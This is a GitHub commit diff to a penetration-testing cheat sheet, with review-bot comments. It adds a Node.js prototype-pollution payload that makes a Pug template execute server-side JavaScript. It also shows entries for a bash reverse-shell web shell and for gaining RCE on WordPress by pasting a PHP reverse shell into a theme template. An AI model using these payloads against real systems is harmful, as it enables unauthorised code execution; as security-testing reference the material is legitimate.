Update Cheat Sheet.md

ARZ 2021-08-20 13:48:26 +05:00 committed by GitHub
parent bb86b16be1
commit 560dcaf551
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23


@ -546,7 +546,6 @@ Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_his
### Web Shell Bash ### Web Shell Bash
`bash -c "<bash_rev_shell>"` `bash -c "<bash_rev_shell>"`
### Wordpress ### Wordpress
using wpscan we can find users or do some further enumeration of wordpress version using wpscan we can find users or do some further enumeration of wordpress version
* `wpscan --url http://<ip>/wordpress -e u` Enumerate Users * `wpscan --url http://<ip>/wordpress -e u` Enumerate Users
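Review bot: the header `@ -546,7 +546,6 @@` records a one-line deletion between the Web Shell Bash and Wordpress entries, but the removed line is not shown here and the commit message (`Update Cheat Sheet.md`) does not say what was dropped or why; please name the removed line in the commit message so reviewers can confirm it was a duplicate rather than a command someone still relies on.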
@ -563,6 +562,26 @@ To get a RCE
* Goto `Appearance` -> `Editor` Select the 404.php template of the current theme and paste php reverse-shell. * Goto `Appearance` -> `Editor` Select the 404.php template of the current theme and paste php reverse-shell.
* Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (theme name can be twentytwenty for the latest one) * Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (theme name can be twentytwenty for the latest one)
### Node JS
#### Prototype Pollution
##### PUG
```
{
"key": "value",
"__proto__.block":
{
"type": "Text",
"line": "test;return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "THIS IS THE VALUE"
}
}
```
### Apache Tomcat ### Apache Tomcat
``` ```
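Review bot: the new `### Node JS` / `#### Prototype Pollution` / `##### PUG` entry is a bare JSON body with no sentence saying when it applies, whereas the neighbouring Wordpress and Web Shell Bash entries give each item a one-line description; this one should too. The text should state that the `"__proto__.block"` key only has an effect when the target application merges untrusted JSON into an object without filtering `__proto__` (so `Object.prototype` ends up polluted) and then compiles a Pug template, that the JavaScript in the `"line"` field is what Pug ends up evaluating (here it just lists the current directory), and that `"key": "value"` and `"val"` are filler. Please also tag the fence as ```json rather than leaving it bare, and add the defensive note that a merge routine which rejects `__proto__` and `constructor` keys (or uses `Object.create(null)` for its target) and an up-to-date Pug both close this path, so readers know what the fix looks like.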